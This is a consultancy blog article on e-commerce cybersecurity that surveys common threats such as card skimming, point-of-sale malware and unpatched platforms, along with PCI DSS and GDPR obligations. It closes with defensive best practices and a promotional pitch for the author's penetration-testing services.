Before the e-Commerce growth, traditional stores were targeted with Point of Sale and general cyber security attacks. This equation of security for the e-commerce sector is different and more complex today. It is difficult to talk about security practices without discussing security issues in the sector. It is also a recommended read if the reader considers sourcing e-business or e-commerce security solutions to improve their business security. Customer data from e-Commerce websites is not only critical for the sales and analytics team, but it is also precious for threat actors. You may find an online store, online retailer or e-Commerce words used interchangeably throughout this article.
e-Commerce and drop shipping being profitable businesses provide opportunities for the big brands and benefit smaller retailers. Traditionally, a business could be B2C (Business-to-consumer), B2B (Business-to-business), C2B (consumer-to-business) and C2C (consumer-to-consumer). Business-to-government (B2G) is combined under B2B e-Commerce business type. Cyber security issues pose a threat to all business types due to these elements’ commonality: online transactions, websites, and payment details.
The most valuable currency for an e-Commerce business is Trust.
If you prefer to watch a condensed version of this article, it is available here:
A good e-Commerce website security ensures the following functions of the CIA triad:
- Confidentiality of consumer data against unauthorised access
- Integrity relates to the accuracy and completeness of data
- Availability is about the timeliness and reliability of the access to use the data
A compromised website can have far-reaching consequences for both the business and its customers. To understand the e-Commerce website security requirements of a business, it is important to analyse the security risks it is exposed to. Even the most secure (as per self-claims) e-Commerce platforms don’t add any magic to your environment. Ultimately, it is your efforts (working with multiple parties) that include a collective measure of layered approaches to keep your data secure. When it comes to e-Commerce website security, almost all the business tech stack’s underlying components are at play. These digital points that offer a relaxed approach could be targeted online and could be a stepping stone towards your production environment.
Pentesting or Security testing for ecommerce websites is often a forgotten area usually rushed before go-live. We will explain the security threats to e-Commerce and how it helps businesses (online retailers and SaaS) by handling them early in the asset lifecycle.
Why is cybersecurity critical for retail businesses?
During the pandemic, UK online sales showed record growth during May 2020 largely due to the closure of high street retail outlets, allowing online stores to grow by 129.5% compared to May 2019.
Multiple warning signs can highlight the presence of fraud in your e-Commerce business transactions. Potential fraud indicators use multiple payment methods from a single IP address, foreign billing or shipping addresses or large volume orders for a single item from new customers. Your development team may unintentionally introduce vulnerabilities while forgetting to differentiate between urgent and important fixes using secure coding practices. By ’re-inventing the wheel’ around critical aspects of an application such as session token generator algorithms or implementing new logic in registration processes could lead to vulnerabilities if not validated by an independent party. Rather than prevent security attacks, a business may be exposed to worse security issues due to such risky practices. Therefore, it is important to standardise the security approach by following trusted sources.
The lifecycle of any e-Commerce sale depends upon the internet, consumer payment and the retailer’s website. All three vectors are attack entry points for cyber-criminals launching e-Commerce cyber security attacks. Consumers are targeted with phishing emails to steal payment information due to their internet presence (social media, emails, phone numbers). There is a sharp rise in this attack vector during peak shopping seasons. Cybercriminals find e-Commerce websites desirable because online retailers are seen as ‘watering holes’ for unsuspecting victims. Overall, Card skimming attacks, Point of Sale malware and Phishing are the top three e-Commerce security issues.
The biggest e-Commerce security issues
The following cybersecurity issues are amongst the top security vulnerabilities affecting retail and e-Commerce businesses. Security for e-Commerce websites vary in attack vector based on the businesses’ exposure and not necessarily target a website. Security challenges in e-commerce could relate to the business’s employees, third party security threats (payment, hosting, network and/or equipment) or customers. A few e-Commerce security threats that are important but not necessarily amongst the top include Insider threats, Payment gateway cybersecurity, hosting provider compromises. This post covers types of e-commerce security and associated security vulnerabilities around clients, servers and communication.
Web and mobile application vulnerabilities
e-Commerce website security issues rank at the top of a CxO’s mind. Web and mobile applications are an attractive target for cybercriminals and pose one of the biggest e-Commerce security issues. Attackers find it economically viable to target many websites using bots and automated scripts to siphon off payment details. Due to the increased use of mobile applications, consumers are at greater risk of vulnerable applications being targeted by criminals. Popular issues in websites include SQL injections, iFrame attacks, Cross-Site Scripting vulnerabilities and brute force attacks. Hijacking interrupts many e-Commerce businesses by redirecting customers to a fake shopping cart and giving away payment information. These are the types of risks often picked up during technical security assessments as part of our e-Commerce security services.
In this app-driven world, we are consuming more information via APIs, ensuring fast processing times. API security risks are on the rise due to insecure deployment methods. They are important for development teams to understand security risks and mitigation measures to ensure security practices are used. Therefore, web and mobile application security in online retail is the most critical component to offer a safe and secure experience for their customers.
Moreover, we have come across several small businesses in e-Commerce who have been compromised and are unaware, only coming to know why search engines like google have blocked their users access to infected websites. e-Commerce platforms play a big reason in the security landscape because traditional CMS was built without security baked into their core. Security as an after-thought is more like fixing things to avoid breaking them further, therefore, at the risk of introducing more risks. It goes without saying that business as usual (BAU) security assessment such as eCommerce penetration testing, source code reviews and infrastructure security should be high on the agenda.
You might be finding it peaceful that use of payment gateways may lessen your security burden. Although it’s true in regards to the payment process security, your website still handles the input data and receiving the data before/after the transaction takes place. Based on the parameters at play between these requests before the external party (third party payment gateways such as stripe, Paypal, square, shopify, opayo, etc), it is important to ensure your setup is dealing with the data and its security and privacy in line with good security practices.
Card skimming attacks are amongst the most popular criminal activities affecting e-Commerce as an industry. A surprising number of businesses fall victim to these campaigns simply due to the lack of proactive retail cybersecurity approaches. A specific example related to popular e-Commerce platforms is MageCart attacks. Magecart attacks are linked to online credit card skimming attacks, where attackers used a shotgun approach to mass compromise by modifying the mage.php code in the Magento websites cart section. A few variations then evolved into more compromises around Magento, OpenCart or OSCommerce platforms. So much so that this cybercriminal group made it into the ‘most dangerous people’ list in Wired magazine’s 2018 edition. Like other open-source software, the ability to edit your source code and make versions suitable to your platform could introduce security vulnerabilities. This customization comes at a price, where the right balance between in-house control of the code and cybersecurity is a delicate business.
Point of Sale Attacks
Point of Sale malware made it mainstream media when American retail giant Target was breached due to a basic network segmentation error. Cybercriminals uploading malware on the point of Sale (PoS) systems allowed data-stealing from cash registers using keyloggers, RAM scrapers, affecting millions of consumers. A PoS compromise delivers instant results for threat actors; it is a lucrative attack vector, facilitating credit card data on the dark web.
What was previously a tick in the box activity now requires a proactive approach towards data security. Compliance and regulations (SOX, HIPPA, PCI DSS) have introduced stringent requirements in line with the increased malicious activity. Check out the following infographic explaining in brief about the different online security issues for e-commerce in 2021.
Insecure patch management is an e-Commerce security vulnerability due to the availability of exploits in the wild. It is important to keep software updated to the latest stable version. This ensures that bugs, performance issues and security fixes are deployed promptly, therefore, minimising the attack surface for an e-Commerce website. With the example of Magento Version 1: support for Magento Commerce and Magento Open Source reached its end of life on 30th June 2020. When software reaches the end of life, it means:
- No active support will be available for the software.
- The vendor will address no security vulnerabilities.
All of the factors above contribute to the lack of updates on third-party integrations, compatibility issues, bugs and effectively degraded performance for the e-Commerce website. Publicly known exploits could add to the security threats.
Vulnerable Third-party Modules
Vulnerable third-party extensions introduce bugs that could compromise core modules such as WordPress, Magento, OpenCart, etc. The most important issue to understand with third-party extensions is to keep up with the latest version releases. Some of the modules do not even have secure coding practices in use during development, and they do not have formal security support in place. This introduces backward incompatibility issues and bugs where shortcut fixes have been put in place.
Ransomware is a targeted approach to control the victim’s website, systems or networks and locking the files until a ransom is paid to the attacker. Ransomware remains one of the biggest cyber security issues today. However, you are never sure if paying a ransom would help decrypt the affected files: “Should you pay the ransom?” It is possible that you could be targeted again, or data may not be decrypted, and you lose either access or sensitive data. Malware and/or ransomware protection is one of the most important aspects of your retail cybersecurity strategy. Simply put, it’s an expensive problem to have.
Compliance security risks
Lack of security patches may lead to a breach of compliance to PCI DSS regulations, clearly making this risk finding part of non-compliance of PCI DSS requirement: “Requirement 6: Develop and Maintain Secure Systems and Applications”. PCI DSS is all about the safety of credit card numbers, customer information records, including personal information, to ensure payment information is encrypted at rest and in transit at all times. You may like our guide on how to achieve PCI compliance if you prefer the self-help method.
For example, the PCI DSS standard explicitly states how PCI DSS penetration testing and vulnerability analysis must maintain compliance. Similarly, it states how segmentation affects in-scope systems or networks for PCI DSS compliance purposes.
“Network segmentation of, or isolating (segmenting), the cardholder data environment from the remainder of an entity’s network is not a PCI DSS requirement. However, it is strongly recommended as a method that may reduce:
- The scope of the PCI DSS assessment
- The cost of the PCI DSS assessment
- The cost and difficulty of implementing and maintaining PCI DSS controls
- The risk to an organization (reduced by consolidating cardholder data into fewer, more controlled locations)
Without adequate network segmentation (sometimes called a “flat network”), the entire network is in the scope of the PCI DSS assessment.”
e-Commerce Privacy issues
GDPR states that any business that processes EU citizen data and experiences a data breach must notify authorities within 72 hours or risk heavy penalties. GDPR sets forth fines of up to 2% of global turnover or up to 10 million euros, whichever is higher. Several high-profile businesses have been fined under this breach. Examples include high profile businesses such as Marriott International (€20 million), Google (€50 m), British Airways (€21 m) and H&M (€35m). Data privacy, especially the preparation of businesses on when and how to report data breaches, is at the forefront of security challenges in the e-Commerce sector irrespective of business size.
ISO/IEC 27001:2013 penetration testing covers technical controls involved in an organisation’s risk management and reduces information security and data protection risks to an organisation. This supports the ISMS (Information Security Management System) maintenance and support for ISO 27001 certification.
Insufficient Logging and Monitoring
Insufficient logging and monitoring are in the top ten risks affecting web applications, as per OWASP top ten risks. The majority of the attacks start with initial probing by attackers; these are often automated scripts or scanning software. Lack of logging and monitoring would encourage the threat actors to raise their attacking attempts to more intrusive levels without the fear of being blocked or caught. Lack of event logging to necessary levels causes complexities during incident response processes in an attack.
Retail cybersecurity strategy without sufficient logging and monitoring controls will provide longer times for intruders in the network and create complexities for post-incident response investigations. Without auditing events, it is almost impossible to figure out what information is at play, misusing it and the likelihood of attacks and appropriate mitigations.
DoS and DDoS Attacks
Denial of Service is a cyber-attack allowing threat actors to render the website unusable for legit users. In the case of a distributed denial of service (DDoS) attack, it can be thought of as a gang of bots (a botnet) attacking the target with constant traffic, far more traffic than the target can handle. Due to the lack of relevant controls, Distributed denial of service (DDoS) attacks would render retail cybersecurity flawed because of gaps in business resilience strategy and causing operational disruptions. This is such an important issue to be mitigated during peak sales periods.
Best practices for e-Commerce security
We often have to answer the question ‘What is good e-commerce security?’. One size doesn’t fit all because the context of the technology stack, business objectives and budgets add to security challenges and solutions. You must know about your security issues before starting to solve the security puzzle. This includes a thorough pen test or security review to identify the gaps, analyse the risks and deciding upon different risk treatment options.
Like the shared responsibility model in the cloud and other areas, security compliance, secure configuration, and management are the customer’s responsibility. Although this cyber security checklist for retail businesses is shared as groundwork, these practices are also a concrete step towards achieving compliance and regulatory requirements such as PCI compliance audit, GDPR, ISO 27001. In cloud computing environments, methodologies differ based on the assets and the deployment (on-prem, hybrid or fully private cloud); the cybersecurity fundamentals remain the same to ensure security for the e-Commerce business. In any case, working around this checklist would ensure a solid ground for protection against cyber attacks.
Bare basics – reducing the impact
- Stay away from cybersecurity solutions offering a one solution approach. Whenever, wherever, whoever talks about providing 100% security to your business, you must tell your brain it’s best to avoid the argument and be ready for the next task in your schedule. They are not just too good to be true; you are also the soft target as an easy sell. Sorry, that’s the truth! We have multiple stories where CTOs and CIOs got sold to IT managed services providers (MSP) to take care of cybersecurity in their organisation, only to find it post-compromise that this was never agreed in pen and paper and nor delivered in substance.
- Sign up for security alerts from the vendor – they are the most authentic source to update the latest changes, alerts and software updates.
- Use separate credentials to regular staff logins for privilege tasks.
- Ensure secure backups are routinely carried out. Randomly audit and test backup restore to ensure it works when you will need it.
- Do not spend on high fee consultancies where basic hardening can be done without large investments of time and money. These include the use of security plugins from trusted parties offered on WordPress and other CMS plugin stores. Change default usernames for an administrator to something difficult to guess, and utilise strong non-dictionary, hard to guess passwords generated randomly.
- Enforce the use of SSL/TLS encryption measures. These are easy to install and configure. For example, in WooCommerce, it is WooCommerce – Settings and Enable ‘Force Secure Checkout’. In Magento Commerce Cloud, you may need to wait for a few hours based on hosting providers support ticket system and processes.
- Undertake regular in-depth security assessments such as our eCommerce penetration testing for applications to identify vulnerabilities affecting web applications, API, mobile applications. Web, Mobile or API security threats are some of the most dangerous risks to your business.
- Keep multiple backups at secure sites.
- Utilise Distributed denial of service (DDoS) service protections meant to help against attacks and website performance improvements.
- If short on security resources, arrange for continuous security scanning exercising utilising managed security services that provide you regular updates on whether your attack surface is shrinking or expanding with time. Any new threats including cloud security risks are dealt with in time to avoid large exposure windows for attackers.
Ensure that the hosting providers actually demonstrate a proactive approach towards security issues in the e-Commerce sector and not just ‘sell’ it via sales calls or marketing campaigns. For example, security measures built into BigCommerce, WooCommerce, Magento or WordPress are not sufficient, and you would require a reliable and reputed hosting provider to add safety and security to your e-Commerce business. This can be easily identified from the practices they follow; a quick, sure-fire way of finding whether they are proactive in their cybersecurity approach or not would be:
- Ask for retail cybersecurity assurance exercises and how often they do it for their platform.
- Ask for a technical report that highlights evidence of their annual or frequent security assessments.
- Check if their developers follow secure coding practices and what standards they adhere to during the development?
- Ask for examples of how they have previously supported the security of websites or security incidents on their customer’s websites.
- Do not rest under the feeling that your e-Commerce is hosted on Amazon, Azure or another cloud provider and security is taken care of. You have to provision your own e-Commerce security services to constantly identify and mitigate risks, ensuring safety for your website users.
- Deploy jump boxes act as a middle layer between the corporate (where staff are located or connected) and the production environment (where the website is hosted). Jump boxes are securely hardened systems hosted in DMZ or private cloud for secure access to production systems. This ensures access to users is allocated on a need to know basis without exposing the production environment. Ensure that jump boxes are checked against secure hardening practices to ensure no breakout opportunities are available and minimise insider threat attacks.
- Mandate password managers’ use for all staff and ensure that they do not mix passwords for corporate and production environments and implement separate domain security policies.
This is one of the most effective and cheapest (mostly!) controls without significant resources. Having networks segmented reduces the risk of compromise by increasing the difficulty for an attacker to find information in more than one place in an organisation. For example, segmentation can separate sensitive information stored in a database away from segments containing user accounts, network equipment, or other organisations’ digital assets. By implementing access restrictions using the network, segmentation ensures minimal exposure internally. Network segmentation is one of the core elements of PCI DSS scope and how access is managed between in-scope systems or networks.
Enabling multi-factor authentication at various checkpoints such as server access and website administrative panels offer an extra layer of protection. Please think of this approach as adding difficulty for security threat actors, where even with a compromised password, they may not be allowed access without a one-time code used as the second factor.
Third Party Extensions
This is one of the popular threats facing e-Commerce websites. Be sure to install extensions from trusted sources only. DO NOT use paid extensions from p2p or torrent websites. Do not install any extensions or software links through suspicious emails. Ask for advice on trusted extensions from any security experts you may liaise with. We are happy to provide free advice. Similarly, any internal APIs or dashboards integrated with the website must be thoroughly reviewed. With online stores, warehouse solutions are often integrated with the corporate environment and the website without due diligence around the solution in use.
Secure Hardening Tips
- Never mix and match any components between the corporate and production environments. One environment can act as a bridge for threat actors to attack the other environment. For example, a retailer with an office and remote-based web development and marketing teams support the company website hosted in the data centre’s production environment. There is direct access to the website through FTP, SSH, RDP, CMS to transfer data fast and efficiently whenever required for marketing and web development teams. In the case of an attack on a marketing employee’s laptop via social engineering/phishing methods, a threat actor may have a direct route into website panel access which could be exploited, leading to the website’s defacement, information theft or any of the worst scenarios imaginable. Implementing a jump box, allocated with secure, hardened baselines defined for users, may make the scenario above difficult for threat actors to exploit.
- Ensure that secure communication protocols such as SSH authentication follow certificate-based authentication and any sensitive information (passcodes, keys, PIN, passwords) are stored in password managers. Disable all FTP, clear-text channels in favour of secure equivalents.
- Follow secure hardening practices on the underlying operating systems such as limiting access to cron.php, patch management, build configuration review of a database, PHP, memory caching systems. Refer to our e-Commerce cybersecurity service offerings in case you require an independent evaluation.
- Restrict access to admin or non-user areas of the website to trusted IP addresses only. This includes SSH ports, CMS panel, administrative and management interfaces.
- Periodically perform permission reviews on all directories that could pose threats from a data leakage perspective. In cloud security terminology, insecure S3 configurations in the AWS cloud is linked with bucket data leakages leading to data thefts. In the traditional sense, this could be equivalent to a directory listing or insecure permission vulnerabilities.
Web Application Firewall
Utilise a Web Application Firewall (WAF) to filter unnecessary noise such as bots. Protect against brute force attacks, admin pages and related content enumeration, discover and block suspicious patterns. Modern content delivery networks offer caching, DoS protection and WAF under the same banner, providing peace of mind and protection against attacks on online stores.
Encryption is more than a certificate on a website. It is about ensuring data at rest and data in transit is secure. It is considered one of the complex security challenges in e-Commerce due to a lack of skill-set depth to ensure secure encryption configuration.
Data in transit relates to securing transport channels (HTTP). Having a secure SSL/TLS certificate ensures strong gaining user trust and maintaining PCI compliance. Data at rest relates to securing data such as credit card numbers, personal information stored in a database. There are privacy regulations (GDPR, DPA 2018, California Consumer Privacy Act) applicable to the businesses based on the location and processing guidelines; these must be followed to avoid fines. Ensure that no sensitive information is stored unless necessary for business purposes; for instance, use username and passwords instead of storing the user’s National Insurance or Social Security numbers. If such PII (Personally Identifiable Information) is not needed, do not collect it. Where required, use strong encryption schemes such as one-way hashing and salts to force uniqueness and increasing passwords complexity. Salting is a way of adding random data to ensure a unique hash output even if two input are the same.
Logging and Monitoring
Review auditing levels for applications, APIs and underlying components and ensure that necessary error types are logged with sufficient detail in case of an event. For instance, input validation failures, access control failures and related events should be logged with user context information. By logging everything, an organisation runs the risk of high-volume logs that pose analysis and storage challenge. Therefore, the right balance should be defined and reviewed for audit trail and incident response plans.
Have a data breach response plan HANDY!
Be prepared. It might sound like the worst recommendation in this article; however, an incident response plan covering data breach response must be in place. This can help you limit the damage in the event of a breach by helping you decide on the next course of actions.
Successful e-Commerce is a win-win for all parties, i.e., businesses and consumers. Covid-19 has forced businesses to adopt new approaches, especially mobile growth for e-Commerce businesses, forcing brick and mortar stores to adopt online business models. Just like the changing patterns of consumers, cybersecurity strategy requires improvements for e-Commerce businesses.
Cybersecurity is an ongoing process. The recommendations listed throughout this article are not a silver bullet approach to cybersecurity to make your business impenetrable. A risk focussed prioritised approach may be necessary based on the cyber security maturity of your organisation. This would help to identify vulnerabilities and prioritising the mitigation measures against security issues. Retail Businesses need to focus on cybersecurity as a holistic solution to protect people, process and technology in addition to consumer information. If a corporate environment is compromised, IP or consumer information theft may still impact the business in the short to medium term. Aligning cybersecurity to act as an enabler for business growth is less costly in the long term.
Your business may benefit from our offerings around the web and mobile application and services, specific infrastructure areas or holistic IT security health check to identify gaps in your current state of infrastructure. Get in touch for a non-salesy chat for your primary security concerns.
Harman Singh is a security professional with over 15 years of consulting experience in both public and private sectors.
As the Managing Consultant at Cyphere, he provides cyber security services to retailers, fintech companies, SaaS providers, housing and social care, construction and more. Harman specialises in technical risk assessments, penetration testing and security strategy.
He regularly speaks at industry events, has been a trainer at prestigious conferences such as Black Hat and shares his expertise on topics such as ‘less is more’ when it comes to cybersecurity. He is a strong advocate for ensuring cyber security as an enabler for business growth.
In addition to his consultancy work, Harman is an active blogger and author who has written articles for Infosecurity Magazine, VentureBeat and other websites.